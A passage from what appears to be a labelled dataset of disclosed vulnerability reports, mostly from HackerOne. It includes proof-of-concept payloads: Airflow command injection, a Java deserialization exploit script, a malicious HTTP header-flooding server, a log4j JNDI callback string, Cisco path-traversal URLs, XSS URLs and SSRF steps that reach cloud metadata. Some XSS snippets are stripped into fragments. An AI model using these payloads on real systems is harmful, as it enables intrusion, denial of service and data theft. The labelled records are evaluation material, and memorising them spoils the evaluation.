"within_source_cve_index", "label": 0} -{"id": "78a17e9a605e18b6d4f7", "text": "[Memory Corruption - Generic] Use of unitialized value in crypto_pk_num_bits (src/common/crypto.c:971)\n\nTriggered in `51e4748`, compiled with clang 6.0.0-trunk and -fsanitize=memory.\n\n`./fuzz-hsdescv2 < test002`\n\n```\n==20245==WARNING: MemorySanitizer: use-of-uninitialized-value\n #0 0x558a63e2d816 in crypto_pk_num_bits /root/tor/src/common/crypto.c:971:3\n #1 0x558a63b8f66a in token_check_object /root/tor/src/or/parsecommon.c:212:23\n #2 0x558a63b8f66a in get_next_token /root/tor/src/or/parsecommon.c:397\n #3 0x558a63b8d097 in tokenize_string /root/tor/src/or/parsecommon.c:72:11\n #4 0x558a63ce97f7 in rend_parse_v2_service_descriptor /root/tor/src/or/routerparse.c:5197:7\n #5 0x558a63889d02 in fuzz_main /root/tor/src/test/fuzz/fuzz_hsdescv2.c:40:10\n #6 0x558a6388977a in main /root/tor/src/test/fuzz/fuzzing_common.c:179:3\n #7 0x7fa41c9773f0 in __libc_start_main /build/glibc-mXZSwJ/glibc-2.24/csu/../csu/libc-start.c:291\n #8 0x558a638177d9 in _start (/root/tor/src/test/fuzz/fuzz-hsdescv2+0x717d9)\n\nSUMMARY: MemorySanitizer: use-of-uninitialized-value /root/tor/src/common/crypto.c:971:3 in crypto_pk_num_bits\n```", "source": "hackerone", "timestamp": "2023-11-28", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "20d7618490d07f803088", "text": "[Cleartext Transmission of Sensitive Information] CVE-2023-23914: curl HSTS ignored on multiple requests\n\n## Summary:\ncurl tool HSTS doesn't work correctly when performing multiple requests within a single invocation.\n\n## Steps To Reproduce:\n\n 1. `curl --hsts \"\" https://hsts.example.com http://hsts.example.com`\n\nThe second request will be performed over HTTP regardless if correct HSTS header is returned by the first request.\n\n## Impact\n\nRequest performed over insecure channels unexpectedly and loss of confidentiality and integrity.", "source": "hackerone", "timestamp": "2023-02-15", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "371edeb99836aa5c6901", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2023-38039: HTTP header allocation DOS\n\nIt was found that curl does not currently limit the amount of HTTP headers to be received leading to a potential DOS for the users.\nIf an attacker sets up a malicious HTTP server that continuously sends new headers and keeps the socket open, curl will continuously listen on the socket and parse new received headers. This leads to the user's machine allocating more and more resources until the system is eventually exhausted.\nFrom research the vulnerable function seems to be located at https://github.com/curl/curl/blob/master/lib/transfer.c#L420.\nFor comparison, modern browsers abort the connection once they reach a threshold.\nOne potential fix to not affect functionality too much would be to set an arbitrary limit to the amount of headers to receive, which I believe is the solution adapted by most modern browsers to solve this issue.\n\n## Screenshot \n{F2513231}\nMy excuses for the French in screenshot (I'm sorting programs by RAM usage, and the top one is of course the windows terminal from which I executed curl). On there you can see my user terminal (windows) launching `curl 127.0.0.1:80` to the left, on the right we see the attacker's server (attaching full source code to this report). Throughout testing memory usage kept increasing alarmingly high.\n\n## Malicious server code extract:\n```\nvoid send_payload(int fd)\n{\n\tmemset(speedup, 'a', sizeof(speedup));\n\t//first we send the start of a valid HTTP request with status line and a few headers\n send(fd, validreq, sizeof(validreq), MSG_MORE);\t\n\twhile (1337)\n\t{\n\t\t//this is used to speed up the dos process sending extra bytes\n\t\tsend(fd, speedup, sizeof(speedup), MSG_MORE );\n\t\t//now we're spamming the curl client with the header \"a:b\" then telling it there's more to come !\n\t\tsend(fd, \"a:b\\x0d\\x0a\", 5, MSG_MORE );\n\t}\n}\n```\n\n## Steps To Reproduce:\n 1. Compile exploit.c and execute the server binary.\nNote: depending on your system, feel free to play with the `ATTACK_SPEED` define of the code, to speed up testing.\n 2. Open up another terminal and as the victim try `curl 127.0.0.1:80`\n 3. Observe system metrics.\n\n## Impact\n\nDOS/overloading of user's system through malicious HTTP server interaction with curl's header parsing.", "source": "hackerone", "timestamp": "2023-09-13", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "88fded51ab7a14212d21", "text": "[Cross-site Scripting (XSS) - Reflected] CVE-2021-42567 - Apereo CAS Reflected XSS on https://█████████\n\nApereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. CAS is vulnerable to a Reflected Cross-Site Scripting attack, via POST requests sent to the REST API endpoints. The payload could be injected on URLs: /███████/. Malicious scripts can be submitted to CAS via parameters such as the ticket id or the username. That results in CAS rejecting the request and producing a response in which the value of the vulnerable parameter is echoed back, resulting in its execution.\n\nVULNERABLE SITE: https://██████████\n\nVULNERABLE ENDPOINT: https://███████/█████████/\n\nPROOF OF CONCEPT:\n-----------------------\n* It seems easy as you just need to drop the XSS payload inside the parameter \"username\" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing.\n\n\n \n
    \n \" />\n \n
    \n \n\n\n* Save the above HTML code as xss.html\n* Open it on the browser \n* You can notice that the XSS is triggered via a POST request.\n\n## Impact\n\nApereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. \n\nREFERENCES :\n---------------\n * https://apereo.github.io/2021/10/18/restvuln/\n * https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html\n * https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md\n * https://nvd.nist.gov/vuln/detail/CVE-2021-42567\n * https://github.com/apereo/cas/releases\n\nBest Regards,\n3th1c_yuk1\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nApereo CAS\n\n## CVE Numbers\nCVE-2021-42567\n\n## Steps to Reproduce\n* It seems easy as you just need to drop the XSS payload inside the parameter \"username\" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing.\n\n\n \n
    \n \" />\n \n
    \n \n\n\n* Save the above HTML code as xss.html\n* Open it on the browser \n* You can notice that the XSS is triggered via a POST request.\n\n## Suggested Mitigation/Remediation Actions\nYou should check the server's version and update to ... not the versions 6.3.7.1 and 6.4.2, but the versions 6.3.7.4 and 6.4.4.2 to mitigate this XSS.", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "e66f0d25b57ffd340070", "text": "[Privacy Violation] Persistent user tracking is possible using window.caches, by avoiding Brave Shields\n\n## Summary:\n\nThe recent version of iOS 15 introduced `window.caches` in WKWebView. It provides a persistent cache for web pages, and is also potentially usable for user tracking.\nThe current [CookieControl.js](https://github.com/brave/brave-ios/blob/development/Client/Frontend/UserContent/UserScripts/CookieControl.js) disables cookie, localStorage and sessionStorage, but it doesn't disable `window.caches`, so it allows client-side user tracking by `window.caches` even when cookie brocker is enabled.\n\n## Products affected: \n\n* Brave for iOS Version 1.41.1 (22.7.27.20)\n* iPhone 8 with iOS 15.6\n\n## Steps To Reproduce:\n\n* Enable Brave Shields and block all cookies\n* Visit https://csrf.jp/2022/caches.php\n* Push \"Set Tracking ID\" button, then your tracking ID is set to window.caches\n* Push \"Get Tracking ID\" button, then you can confirm your tracking ID that was set above\n* Close your browser and visit the above page again\n* Push \"Get Tracking ID\" button, then you can see your tracking ID again\n\n## Supporting Material/References:\n\n * Attached is a movie file that demonstrate the above steps to reproduce.\n\n## Impact\n\nAs witten in summary, client-side user tracking by `window.caches` is possible even when cookie brocker is enabled.", "source": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "5ff0da18a5ae526feb21", "text": "[Uncontrolled Resource Consumption] Inviting excessive long email addresses to a calendar event makes the server unresponsive\n\n## Summary:\nDue to the absence of a character limit in the email address field when sending emails, requests containing lengthy email addresses causes the server to get delay response, ultimately resulting in a denial of service.\n\n\n## Steps To Reproduce:\n1. As, a low privileged user, go to https://serveraddress/apps/calendar/dayGridMonth/now and create a new calendar.\n\n{F2480561}\n\n2. Click on Share link, click on share calendar link via email and intercept the request in burp entering a random email.\n\n3. Send the request to repeater and observe the response time. The server will respond in ~600ms.\n\n{F2480573}\n\n{F2480610}\n\n4. Now, use the attached payload of 50 MB (email_recipient.txt) in email and send the response. You will get response in about 10000 milllisecond. Larger the email length, longer will be the reponse time.\n\n\n\n{F2480615}\n\n[Note: you may use the following python script and payload attached below. POC attached :) ]\n\n## Impact\n\nDenial of service", "source": "hackerone", "timestamp": "2023-10-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d8c89976e833ca1fe231", "text": "[Command Injection - Generic] CVE-2022-38362: Apache Airflow Docker Provider <3.0 RCE vulnerability in example dag\n\nApache Airflow Docker's Provider shipped with an example DAG that was vulnerable to (authenticated) remote code exploit of code on the Airflow worker host.\n\n##Vulnerability summary:\nIn DAG script of airflow 2.3.3, there is a command injection vulnerability (RCE) in the script (example_docker_copy_data.py of docker provider), which can obtain the permission of the operating system. \n\nsource path: \nairflow-2.3.3/airflow/providers/docker/example_dags/example_docker_copy_data.py\n\n##Vulnerability details:\n(1) Vulnerability principle:\n1. It can be seen from the source code of example_docker_copy_data.py script that there is the function of executing bash command, The parameter ‘source_location’ in the template expression {{params.source_location}} is externally controllable and rendered through the jiaja2 template: \n\n{F1869746}\n\n2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;\n\n{F1869748}\n\n(2)Vulnerability exploit:\n1. Enter the DAGs menu and start docker_sample_copy_data task, select “Trigger DAG w/ config”. \n\nhttp://192.168.3.17:8080/trigger?dag_id=docker_sample_copy_data\n\n{F1869749}\n\n2. To construct payload, we can separate commands with ‘;’, so as to inject any operating system commands to be executed(RCE).\n\n{F1869750}\n\nPAYLOAD:```{\"source_location\":\";touch /tmp/thisistest;\"}```, Then click trigger to execute the task.\n\n{F1869755}\n\nThe final command is as follows:\n```locate_file_cmd = “”” sleep 10\nfind ;touch /tmp/thisistest; -type f -printf “%f\\n” | head -1\n“””\n```\n\nThrough the log and server view, it can be seen that arbitrary command has been executed successfully.\n\n{F1869756}\n\n{F1869757}\n\n## Impact\n\nAn attacker can execute arbitrary commands on the airflow host.", "source": "hackerone", "timestamp": "2022-09-23", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "74b176a166a39eed9b76", "text": "[Unknown] CVE-2017-5929: Hyperledger - Arbitrary Deserialization of Untrusted Data\n\n## Vulnerability Overview\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.\n\nDeserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution. Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed. Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n**System Host(s):**\nhttps://github.com/hyperledger/fabric-chaincode-java/blob/-/fabric-chaincode-integration-test/src/contracts/wrapper-maven/pom.xml\nQOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderClient class in logback-classic and the SocketNode classes in logback-classic and logback-access allow data to be deserialized over a Java Socket, via an ObjectInputStream, without validating the data beforehand. When data is received from the Socket, to be logged, it is deserialized into Java objects.An attacker can exploit this vulnerability by sending malicious, serialized Java objects over the connection to the Socket, which may result in execution of arbitrary code when those objects are deserialized. Note that although logback-core is implicated by the Logback project here, the Sonatype Security Research team discovered that the vulnerability is actually present in the logback-classic and logback-access components. Versions prior to 1.2.0 are vulnerable, as stated in the advisory.\n\n**Exploitation code:**\n```python\nimport socket\nimport sys\n\nhost = sys.argv[1]\nport = sys.argv[2]\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint \"Connecting to: \" + host + \":\" + port\nsock.connect((host, int(port)))\nprint \"Connected.\"\n\npayload = '\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x2e\\x6a\\x61\\x76\\x61\\x78\\x2e\\x6d\\x61\\x6e\\x61\\x67\\x65\\x6d\\x65\\x6e\\x74\\x2e\\x42\\x61\\x64\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\\x56\\x61\\x6c\\x75\\x65\\x45\\x78\\x70\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd4\\xe7\\xda\\xab\\x63\\x2d\\x46\\x40\\x02\\x00\\x01\\x4c\\x00\\x03\\x76\\x61\\x6c\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61", "source": "hackerone", "timestamp": "2022-10-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "d6027174ef2e2111dfc7", "text": "[Uncontrolled Resource Consumption] ReDoS( Ruby, Time)\n\nI reported at https://hackerone.com/reports/1485501\n\nhttps://www.ruby-lang.org/en/news/2023/03/30/redos-in-time-cve-2023-28756/\n> The Time parser mishandles invalid strings that have specific characters. It causes an increase in execution time for parsing strings to Time objects.\n> A ReDoS issue was discovered in the Time gem 0.1.0 and 0.2.1 and Time library of Ruby 2.7.7.\n\n## Impact\n\nReDoS occurs when `Time.rfc2822` accepts user input.\n\nIn `Rack::ConditionalGet`, the header value is parsed by `Time.rfc2822`, it is possible to attack from the request.\nRails uses `::Rack::ConditionalGet` by default, it can be attacked by a request from the client.", "source": "hackerone", "timestamp": "2023-04-26", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "4416d543086e7d7f92af", "text": "[Business Logic Errors] Response Manipulation lead to bypass verification code while making appointment at `█████████`\n\n## Steps To Reproduce:\n\n1. Go to this URL https://www.███/visit-information/schedule-appointment/\n2. Make an appointment\n3. Choose send verification code to email\n4. Enter random code \n5. Intercept the request using burp\n4. Click do intercept response and forward\n5. Change false to true\n\n## Impact\n\nbypass verification code", "source": "hackerone", "timestamp": "2023-08-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "c5db390efafaadb2036b", "text": "[Server-Side Request Forgery (SSRF)] Full read SSRF at █████████ [HtUS]\n\nHeyy there,\nWe have found a full read ssrf vuln in https://█████ , we were able to hit the AWS Metadata endpoint (http://███████) though the SSRF Vuln.\n\n\n------------\n\n**Steps to reproduce:**\n\n1.Goto https://██████/users/create and create an account\n2.After you account is verified , get login\nIf for some reasons you are not the verification code, try with a gmail id\n\n3.Now visit: https://████/products/create/ and fill the required details\n4.Once your product is created, click on `New Configuration` which is under *LRS Configurations*\n\n████████\n\n5.Enter this as the input for * LRS URL *: `http://█████████/latest/meta-data?` (the question mark at the end is important)\n6.Under *Basic Auth User & Pass* enter test for both fields and click on `Create new LRS configuration` \n\n█████\n\n7.Once the `Configuration` is created click on the `Test` button beside the conifguration name\n████\n8.Now you will be redirected to the homepage, so go back to the product page\n9.Under `Past Results` you should be able to see a new entry\n10.Click on `Manage Test record` > `Download log`\n11.Now check the `Include HTTP` checkbox and from the `Log Format` drop down menu choose *Plain text*\n\nA file with the name `log` should be downloaded in your computer, just open it and there you will find the response from the aws meta data endpoint:\n\n```\n\n\"\"\nfailed\n\"SyntaxError: Unexpected token a in JSON at position 0\"\nREQUEST SUPERREQUEST\n_______________________________________\nPOST /latest/meta-data?/statements HTTP/1.1\nX-Experience-API-Version: 1.0.3\nAuthorization: Basic dGVzdDp0ZXN0\nhost: ██████████\naccept: application/json\ncontent-type: application/json\ncontent-length: 324\nConnection: close\n\n{\"actor\":{\"objectType\":\"Agent\",\"name\":\"xAPI mbox\",\"mbox\":\"mailto:████\"},\"verb\":{\"id\":\"http://███\",\"display\":{\"en-GB\":\"attended\",\"en-US\":\"attended\"}},\"object\":{\"objectType\":\"Activity\",\"id\":\"http://www.example.com/meetings/occurances/34534\"},\"id\":\"3b9e4565-07ac-475f-be1f-d5f590f40779\"}\n\nRESPONSE SUPERREQUEST\n_______________________________________\nHTTP/1.0 200 OK\naccept-ranges: bytes\ncontent-length: 326\ncontent-type: text/plain\ndate: Wed, 06 Jul 2022 13:48:12 GMT\nlast-modified: Thu, 30 Jun 2022 09:37:12 GMT\nconnection: close\nserver: EC2ws\n\nami-id\nami-launch-index\nami-manifest-path\nblock-device-mapping/\nevents/\nhibernation/\nhostname\nidentity-credentials/\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nmetrics/\nnetwork/\nplacement/\nprofile\npublic-hostname\npublic-ipv4\npublic-keys/\nreservation-id\nsecurity-groups\nservices/\n=======================================\nREQUEST SUPERREQUEST\n_______________________________________\nGET /latest/meta-data?/statements?statementId=3b9e4565-07ac-475f-be1f-d5f590f40779 HTTP/1.1\nX-Experience-API-Version: 1.0.3\nAuthorization: Basic dGVzdDp0ZXN0\nhost: ██████\nConnection: close\n\nRESPONSE SUPERREQUEST\n_______________________________________\nHTTP/1.0 200 OK\naccept-ranges: bytes\ncontent-length: 326\ncontent-type: text/plain\ndate: Wed, 06 Jul 2022 13:48:12 GMT\nlast-modified: Thu, 30 Jun 2022 09:37:12 GMT\nconnection: close\nserver: EC2ws\n\nami-id\nami-launch-index\nami-manifest-path\nblock-device-mapping/\nevents/\nhibernation/\nhostname\nidentity-credentials/\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nmetrics/\nnetwork/\nplacement/\nprofile\npublic-hostname\npublic-ipv4\npublic-keys/\nreservation-id\nsecurity-groups\nservices/\n=======================================\n\n```\n\n## Impact\n\nAn attacker can dump aws keys , reach internal hosts and etc\n\n\nThankyou\nRegards\nheint and sudi", "source": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "a45b1043f0434fa1154a", "text": "[Unknown] A vulnerability classified as critical has been found in gsi-openssh-server 7.9p1 on Fedora (Connectivity Software) on server (http://95.217.64.181:22\n\n## Summary:\n\" hello \"\nvulnerability:\nGSI-OPENSSH-SERVER 7.9P1 ON FEDORA /ETC/GSISSH/SSHD_CONFIG CREDENTIALS MANAGEMENT\nDescription of problem:\nA vulnerability classified as critical has been found in gsi-openssh-server 7.9p1 on Fedora (Connectivity Software) on server (http://95.217.64.181:22). This affects some unknown functionality of the file /etc/gsissh/sshd_config. The manipulation with an unknown input leads to a privilege escalation vulnerability. CWE is classifying the issue as CWE-255. This is going to have an impact on confidentiality, integrity, and availability. The summary by CVE is:\n\nAn issue was discovered in gsi-openssh-server 7.9p1 on Fedora 29. If PermitPAMUserChange is set to yes in the /etc/gsissh/sshd_config file, logins succeed with a valid username and an incorrect password, even though a failure entry is recorded in the /var/log/messages file.\nThe bug was discovered 02/08/2019. The weakness was released 02/08/2019. This vulnerability is uniquely identified as CVE-2019-7639 since 02/08/2019. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. Technical details of the vulnerability are known, but there is no available exploit. The attack technique deployed by this issue is T1552 according to MITRE ATT&CK.\n\n\nIf PermitPAMUserChange is set to yes in the sshd_config for gsi-openssh-server, anyone is allowed to login to the system with existing user even if they provide incorrect password\n\nVersion-Release number of selected component (if applicable): 7.9p1\n\nHow reproducible:\nAlways\n\nSteps to Reproduce:\n1. Install gsi-openssh-server\n2. Initialize rsa, ecdsa, ed25519 keys for gsi-openssh server using gsissh-keygen\n2. Set PermitPAMUserChange to yes in /etc/gsissh/sshd_config\n3. Run /usr/sbin/gsisshd\n4. Try to connect to the system using Putty with user \"root\" and some incorrect password like \"test1234\" (The actual password for root on the test system was root1234)\n\nActual results:\nUser gets logged in even though there is a failure entry in /var/log/messages for user authentication\n\n\nExpected results:\nUser should not be able to login unless he provides the correct password\n\nAdditional info:\nits possible that earlier versions might also be vulnerable.\n\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-7639\n\n## Impact\n\nThis is going to have an impact on confidentiality, integrity, and availability", "source": "hackerone", "timestamp": "2022-12-10", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "6a7f45f9f318977162a7", "text": "[Unknown] Rack CVE-2022-30122: Denial of Service Vulnerability in Rack Multipart Parsing\n\nReDoS in `Rack::Multipart::BROKEN_QUOTED` and `Rack::Multipart::BROKEN_UNQUOTED`.\n\n\nhttps://groups.google.com/g/ruby-security-ann/c/L2Axto442qk\n> Carefully crafted multipart POST requests can cause Rack's multipart parser to take much longer than expected, leading to a possible denial of service vulnerability.\n\n## Impact\n\nWhen the client sends a specially crafted header, it occur ReDoS on the server side.\nServers that interpret Post data by default, like Rails, are affected.", "source": "hackerone", "timestamp": "2022-07-23", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "c5006b0db4f277240efd", "text": "[Cross-site Scripting (XSS) - Reflected] XSS in ServiceNow logout https://████:443\n\n**Description:**\nXSS in ServiceNow logout \nhttps://██████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n## References\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-38463\n\n## Impact\n\nUnauthenticated remote attacker can execute code in user's browser context. User must click on malicious link\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\nServicenow prior to SanDiego SP6\n\n## CVE Numbers\nCVE-2022-38463\n\n## Steps to Reproduce\nClick on https://█████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n\n## Suggested Mitigation/Remediation Actions\nUpgrade to patched version of ServiceNow", "source": "hackerone", "timestamp": "2023-05-15", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "555f8d8c5d72ae720621", "text": "SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authorization Bypass (IDOR)\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2022-12-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3c9e7caaf42f08eaa3f9", "text": "[Business Logic Errors] Attacker shall recieve order updates on whatsapp for users who have activated whatsapp notification\n\nH\n\nSummary:\n1. Order ID are IDOR ( Insecure Direct Object Reference )\n2. When users activated whats app notification an attacker would start receiving the notification without user interaction about their order.\n\nProof Of Concept:-\n\nWhen an user order on a restaurant he/she can start whatsapp notification on their order.\n\n██████████\n\nSteps to Reproduce:-\n\n1. When the user activates whats app notification by sending the message with order id. His order notification's vulnerable.\n\n2. Now the attacker sends the message with above vulnerable order id ( Order id is IDOR - eg:15625383 )\n\n3. He will get the error notification, though he will start receiving the updates.\n\n{F1670097}\n\n3.1 the updates would be\n3.1.1 delivery partner assigned.\n3.1.2 when he will reach\n3.1.2 once he delivered the order.\n\n## Impact\n\nbusiness logic error.", "source": "hackerone", "timestamp": "2022-04-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "1f0fdde00633c9bd0ccf", "text": "[Code Injection] Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces\n\nI submitted the following report to security@kubernetes.io:\n> I've been exploring CVE-2021-25742 and believe I've discovered a variant (although it appears there may be many). Most template variables are not escaped properly in `nginx.tmpl`, leading to injection of arbitrary nginx directives. For example, the `nginx.ingress.kubernetes.io/connection-proxy-header` annotation is not validated/escaped and is inserted directly into the `nginx.conf` file.\n>\n> An attacker in a multi-tenant cluster with permission to create/modify ingresses can inject content into the connection-proxy-header annotation and read arbitrary files from the ingress controller (including the service account).\n>\n> I've created a secret gist demonstrating the issue against ingress-nginx v1.0.4: https://gist.github.com/amlweems/1cb7e96dca8ada8aee8dc019d4163f2c\n\n## Impact\n\nAn attacker with permission to create/modify ingresses in one namespace can inject content into the connection-proxy-header annotation and read arbitrary files from the ingress controller (including the service account). This service account has permission to read secrets in all namespaces.", "source": "hackerone", "timestamp": "2022-08-13", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "cc92341925df7a611f58", "text": "[Use of Externally-Controlled Format String] ██████████ running a vulnerable log4j\n\n**Description:**\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://████████/███████https%3A%2F%2F█████████%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "2e1720baf5e5d63d2a68", "text": "OpenBMCS 2.4 Authenticated SQL Injection\n\nSeverity: high", "source": "zeroscience", "timestamp": "2022-01-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "5dfed4c319c627108a7f", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS at ████████\n\nThe domain █████████ have dochelper where the user id is submitted.\nWe can submit the crafted XSS payload to pop the alert message by accesing the cookie.\n\nPOC URL: \n```\nhttps://████/dochelper?userId=\n\nRecommendation :- \n\nAdd X-FRAME-OPTIONS header to mitigate the issue\n\n## Impact\n\nAn attacker may use this risk to invisibly load the target website into their own site and trick users into clicking on links which they never intended to. An \"X-Frame-Options\" header should be sent by the server to either deny framing of content, only allow it from the same origin or allow it from a trusted URIs.", "source": "hackerone", "timestamp": "2022-01-12", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "4191b505d4fcb59d63e6", "text": "[Path Traversal] CVE-2020-3452 on https://█████/\n\nHello team,\nI hope you're doing well, healthy & wealthy.\n\nI found a CVE-2020-3452 path traversal and here is the explanation.\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## References\n\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n ** classification:**\n- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n- cvss-score: 7.50\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nCisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nPlease do this GET request below.\n\n- https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\nSecond attack type:\n\n- https://██████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\nYou can see the file can be downloaded.\n\n## Suggested Mitigation/Remediation Actions\nPlease upgrade to the latest version of the software.\n\nBest regards.\n@pirneci", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "0701d5412c8cd26b7bf4", "text": "[Cross-site Scripting (XSS) - Reflected] XSS Reflected - ██████████\n\nHi Team,\n\nI found a XSS Reflected.\n\n```\nhttps://██████████/███onload=%22prompt(1)\n```\n\nThanks DRauschkolb\n\n## Impact\n\nXSS vulnerabilities can be used to trick a web user into executing a malicious script, potentially revealing a user's web session information or modify web content & even steal cookies.\n\n## System Host(s)\n██████████\n\n## Affected Product(s) and 